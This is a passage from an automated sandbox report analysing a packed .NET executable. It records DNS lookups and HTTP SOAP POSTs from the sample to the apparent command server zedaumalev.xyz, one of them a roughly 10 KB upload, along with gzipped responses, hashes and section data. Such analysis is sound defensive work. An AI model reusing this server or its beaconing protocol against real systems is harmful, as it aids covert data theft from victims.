Copyright Joe Security LLC 2021 Page 14 of 19 Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics .idata 0x1cc000 0x2000 0x200 False 0.16796875 data 1.14864242974 IMAGE_SCN_CNT_INITIALIZED_D ATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ (l)ZCs S 0x1ce000 0x33800 0x33800 False 0.999834079187 data 7.99901505721 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_D ATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ .themida 0x202000 0x384000 0x0 unknown unknown unknown unknown IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_D ATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ .boot 0x586000 0x160e00 0x160e00 False 0.988194767313 data 7.95081773029 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_D ATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ (l)ZCs S 0x6e8000 0x8d0 0xa00 False 0.865234375 data 7.29120131367 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ .rsrc 0x6ea000 0x3378f 0x33800 False 0.130740860133 data 4.27264624831 IMAGE_SCN_CNT_INITIALIZED_D ATA, IMAGE_SCN_MEM_READ

Resources

Imports

Version Infos

Possible Origin

Language of compilation system Country where language is spoken Map

Konkani India

English United States

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Jun 23, 2021 15:57:58.243825912 CEST 192.168.2.3 8.8.8.8 0xc9e1 Standard query zedaumalev.xyz A (IP address) IN (0x0001) (0) Jun 23, 2021 15:58:00.808989048 CEST 192.168.2.3 8.8.8.8 0x3a4d Standard query api.ip.sb A (IP address) IN (0x0001) (0) Jun 23, 2021 15:58:00.878340960 CEST 192.168.2.3 8.8.8.8 0x4828 Standard query api.ip.sb A (IP address) IN (0x0001) (0) Jun 23, 2021 15:59:45.034365892 CEST 192.168.2.3 8.8.8.8 0x8405 Standard query zedaumalev.xyz A (IP address) IN (0x0001) (0)

DNS Answers

Copyright Joe Security LLC 2021 Page 15 of 19 Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class Jun 23, 2021 8.8.8.8 192.168.2.3 0x1c03 No error (0) api.global 104.18.24.243 A (IP address) IN (0x0001) 15:57:30.092854977 sign.cloud CEST Jun 23, 2021 8.8.8.8 192.168.2.3 0x1c03 No error (0) api.global 104.18.25.243 A (IP address) IN (0x0001) 15:57:30.092854977 sign.cloud CEST Jun 23, 2021 8.8.8.8 192.168.2.3 0xc9e1 No error (0) zedaumalev.xyz 77.246.145.4 A (IP address) IN (0x0001) 15:57:58.303046942 CEST Jun 23, 2021 8.8.8.8 192.168.2.3 0x3a4d No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.n CNAME IN (0x0001) 15:58:00.867274046 et (Canonical CEST name) Jun 23, 2021 8.8.8.8 192.168.2.3 0x4828 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.n CNAME IN (0x0001) 15:58:00.937092066 et (Canonical CEST name) Jun 23, 2021 8.8.8.8 192.168.2.3 0x8405 No error (0) zedaumalev.xyz 77.246.145.4 A (IP address) IN (0x0001) 15:59:45.104382038 CEST Jun 23, 2021 8.8.8.8 192.168.2.3 0x5928 No error (0) prda.aadg. www.tm.a.prd.aadg.akadn CNAME IN (0x0001) 15:59:45.645648956 msidentity.com s.net (Canonical CEST name)

HTTP Request Dependency Graph

zedaumalev.xyz

HTTP Packets

Session ID Source IP Source Port Destination IP Destination Port Process 0 192.168.2.3 49726 77.246.145.4 80 C:\Users\user\Desktop\z01OUde5Dj.exe

kBytes Timestamp transferred Direction Data Jun 23, 2021 1301 OUT POST / HTTP/1.1 15:57:58.709378004 CEST Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: zedaumalev.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive Jun 23, 2021 1301 IN HTTP/1.1 100 Continue 15:57:58.788089991 CEST

Copyright Joe Security LLC 2021 Page 16 of 19 kBytes Timestamp transferred Direction Data Jun 23, 2021 1302 IN HTTP/1.1 200 OK 15:57:59.013820887 CEST Server: nginx Date: Wed, 23 Jun 2021 13:57:58 GMT Content-Type: text/xml; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 33 64 35 0d 0a 1f 8b 08 00 00 00 00 00 02 03 bd 58 6d 8f e2 36 10 fe 2b 11 d2 4a 57 74 4b b8 6e bb 3d 21 0e 89 97 40 51 97 5d 8e 70 7b ad 94 2f c6 19 88 8b e3 89 6c 67 03 ab fb f1 35 21 61 97 e5 5a 95 98 56 42 24 99 f1 3c 1e 8f c7 e3 c7 6e ab 96 27 9e 80 63 02 ce 26 e6 42 b5 d4 a7 5a a4 75 d2 72 5d 45 23 88 89 6a 18 b9 42 92 34 50 ae dc dd 8b 0b 85 85 5b eb b4 55 ab 87 e1 b6 d3 1e 81 ee ca 55 1a 83 d0 6a 06 2a 41 a1 0a c4 03 9e 86 38 49 25 cb 71 6a 27 16 29 d7 85 07 e4 53 ad 27 31 53 20 bd 8d 06 a1 18 8a 5a a1 62 07 b0 2c cb 1a d9 4d 8e f5 63 b3 f9 c1 fd 7d 72 e7 e7 fe 5e 33 a1 34 11 14 4c 17 a4 d5 e3 48 d7 10 f6 31 15 5a 6e 0b 94 c5 c9 10 63 46 25 2a 5c ea 06 c5 78 07 78 e3 7e 68 ba 3e 48 4 6 38 7b 26 da b8 e0 76 a5 24 5b 55 73 5f c1 8e a7 17 43 7c 58 fc 09 54 ff d4 59 12 ae a0 ed be 08 0e ba db 8e 96 e9 2b d 5 ed 4e e5 53 22 8a 60 a9 83 fe 48 58 34 ea 47 12 63 28 a5 53 a2 23 75 09 df 3b ed 45 4b 69 c9 c4 aa 73 f5 c5 f7 66 d3 d 9 c3 70 7c e7 5d 05 dd 24 19 10 4d 82 3b a4 84 07 79 ef 2c 8d 83 2f a6 77 67 a7 68 bb 07 c3 7f 07 31 42 5c 71 d8 23 81 3 5 ce bb cd c7 db 1f 6c c0 66 48 62 a3 0d 1e 12 90 c4 f1 4d b0 32 22 21 38 db 9d 09 49 38 f8 3a 0d 19 16 ee 4c 79 aa 2c c 6 37 96 2c b4 8b f4 2f be 26 b2 f8 af 8e d2 37 eb ba 48 37 1b 94 08 42 d4 16 00 8f ec 89 f0 90 59 20 fc 66 e6 c4 7c 54 07 f0 38 e4 45 ce b1 0f 87 97 30 ea 4c a5 19 13 dd 5e 00 2e ed e3 f3 04 42 66 46 27 89 b0 00 1a 82 90 4c 3a 63 41 03 9f 03 4b 04 93 3f 07 0a b4 de 2d 91 18 c3 94 83 3a 14 81 47 06 19 c8 f3 53 c1 bc 72 26 c8 48 62 9a 04 7d 66 2c d0 26 b3 10 33 14 e5 a3 3a 0e 67 b0 20 36 8e 7c 36 bb 88 9f ca a5 05 c4 83 5c 30 6d b5 e6 fb 68 66 09 83 81 24 2b ab 68 74 63 b6 da 07 c3 02 64 8e 92 46 16 f6 7f 10 11 c2 a6 78 5c a0 06 ed 63 53 1d e0 e6 b6 59 7a 61 ef cd 84 6c 74 84 e2 c6 a6 a2 5d 4f 0c 7f b3 99 66 3f 49 b5 60 eb c3 b3 3a d2 3d a3 b6 3b 7a 1f a9 f9 5d 20 b4 96 45 30 af 6f 76 99 32 21 8c 37 66 69 d0 d5 68 b3 9a 7b 92 3c c1 81 93 e4 5f d7 17 c8 bc 92 16 06 5e b8 b2 99 b0 fb c7 f1 60 dc 75 fa 28 13 94 39 9d 2c 45 23 18 9a b5 0f 8e b7 31 b4 8a 81 61 f1 e7 a7 a6 06 12 9f 3f 77 72 9b 68 9c 93 c5 3f ef aa ee df 92 e9 92 67 0f 98 a2 28 c3 23 2e 5e ca 8a 26 c3 f9 f4 85 e6 97 82 52 c7 cc 4e f9 46 9b 8b 5e eb ff 13 f6 9e 9a a1 24 12 97 a6 83 ab 60 00 6a ad 31 f9 56 6f e8 8d 7e 5f 6f 84 48 eb ef eb 6b d8 9a ff 8c 70 0e da bc 28 80 b0 fe ad f9 fd 58 1f c3 21 dd 9f f3 ce 06 74 df 0e bb 0c c4 08 e8 1a ff ff e3 4c 49 fb 27 f8 cc 38 27 c1 90 49 58 e2 a6 c2 c1 e1 2b d1 20 ab 99 e6 f5 1b 50 54 30 9d 47 a9 d9 14 0d 5d 90 61 05 eb 62 27 1c 53 d8 13 85 0a 10 1f 13 a0 1b 95 9f 77 0c 23 dc 2e aa c6 e0 de 9b 8f ba 73 cf 99 03 8d 04 72 5c 31 c3 30 7b 9c d0 f5 af 24 ab 80 37 41 14 34 62 3c 34 f4 da f0 55 ba cb 0a 15 4c 09 07 67 a7 fa 4e 4e 9e 66 60 99 9b 3e 95 00 e2 78 15 17 b2 b2 c5 ae 48 bd 69 90 8b 0a fd dc cc ef 4a be 6d 72 90 16 ad 1e a7 f7 c7 0d 76 82 42 f7 35 5f 54 c7 77 02 a5 ac ed 9e de bd 9c 0a f3 2b 1c 23 2e 6f 78 dc 97 ab a2 ce 5f a3 03 59 c4 37 12 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3d5Xm6+JWtKn=!@Q]p{/lg5!aZVB$ HF8{&v$[Us_C|XTY+NS"`HX4Gc(S#u;EKisfp|]$M;y,/wgh1B\q#5lfHbM2"!8I8:Ly,7,/&7H7BY f|T8E0L^.BfF'L:cAK?-: GSr&Hb}f,&3:g 6|6\0mhf$+htcdFx\cSYzalt]Of?I`:=;z] E0ov2!7fih{<_^`u(9,E#1a?wrh?g(#.^&RNF^$`j1Vo~_oHkp(X!tLI'8'IX+ PT0G]ab'Sw#.sr\10{$7A4b<4ULgNNf`>xHiJmrvB5_Tw+#.ox_Y70

Session ID Source IP Source Port Destination IP Destination Port Process 1 192.168.2.3 49733 77.246.145.4 80 C:\Users\user\Desktop\z01OUde5Dj.exe

kBytes Timestamp transferred Direction Data Jun 23, 2021 1341 OUT POST / HTTP/1.1 15:59:45.185383081 CEST Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest" Host: zedaumalev.xyz Content-Length: 10709 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive Jun 23, 2021 1341 IN HTTP/1.1 100 Continue 15:59:45.263923883 CEST Jun 23, 2021 1357 IN HTTP/1.1 200 OK 15:59:45.551058054 CEST Server: nginx Date: Wed, 23 Jun 2021 13:59:45 GMT Content-Type: text/xml; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 02 03 45 ce cd 0a 83 30 10 04 e0 57 29 79 00 f7 1e d2 1c 0a 7d 01 0b bd 07 bb fe 80 c9 6e 33 51 ea db b7 8a d5 db 30 30 1f e3 60 ef 69 e6 51 94 2f 9f 38 26 58 5c 4d 5f 8a 5a 22 34 3d c7 80 ea d7 43 82 56 92 3b 5a 03 f1 be 20 e3 1d ec 4d 5e 8b 77 4f ce 43 bb 3c 9a 90 6a 7e 4f 8c 52 33 54 12 76 f6 40 0b 47 9d f2 b0 61 86 bc a3 3f 40 e7 13 ff 05 5c 3b 8e 2a 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83E0W)y}n3Q00`iQ/8&X\M_Z"4=CV;Z M^wOC

Copyright Joe Security LLC 2021 Page 17 of 19 kBytes Timestamp transferred Direction Data Jun 23, 2021 1424 IN HTTP/1.1 200 OK 15:59:45.892076015 CEST Server: nginx Date: Wed, 23 Jun 2021 13:59:45 GMT Content-Type: text/xml; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 02 03 65 8f c1 0a c2 30 0c 86 5f 45 7a 77 99 7a 2b 5d 0f 03 f1 a2 17 45 f0 5a b6 e0 0a 5b 5b 96 cc ce b7 77 8e 3a 41 6f e1 4f f2 e5 8b 22 b9 77 0f 6c 7d c0 d5 d8 b5 8e 24 15 a2 61 0e 12 80 aa 06 3b 43 d9 94 93 37 21 f3 fd 1d de 05 60 da 00 a1 15 c9 d2 d7 4f ad 0e c8 d7 50 1b 46 3a 23 05 ef 28 f1 16 1a 63 17 86 de ce 14 f1 33 3f b4 9c ae 9b 42 94 bd 8f 84 fd 7e 64 74 64 bd 13 a9 65 17 54 8c 31 8b bb 99 b4 cd f3 0d dc 4e c7 cb ec ba b6 8e d8 b8 0a 05 68 05 ff 4a 53 f8 f1 85 ef e3 fa 05 18 8f 8c 84 05 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3e0_Ezwz+]EZ[[w:AoO"wl}$a;C7!`OPF:#(c3?B~dtdeT1NhJS0

Code Manipulations

Statistics

System Behavior

Analysis Process: z01OUde5Dj.exe PID: 2792 Parent PID: 5644

General

Start time: 15:57:37 Start date: 23/06/2021 Path: C:\Users\user\Desktop\z01OUde5Dj.exe Wow64 process (32bit): true Commandline: 'C:\Users\user\Desktop\z01OUde5Dj.exe' Imagebase: 0x2b0000 File size: 2958360 bytes MD5 hash: B66BA241FE7EDB6C16DDD9341F1E84D4 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: low

File Activities Show Windows behavior

File Created

File Read

Registry Activities Show Windows behavior

Disassembly

Code Analysis

Copyright Joe Security LLC 2021 Page 18 of 19 Copyright Joe Security LLC Joe Sandbox Cloud Basic 32.0.0 Black Diamond

Copyright Joe Security LLC 2021 Page 19 of 19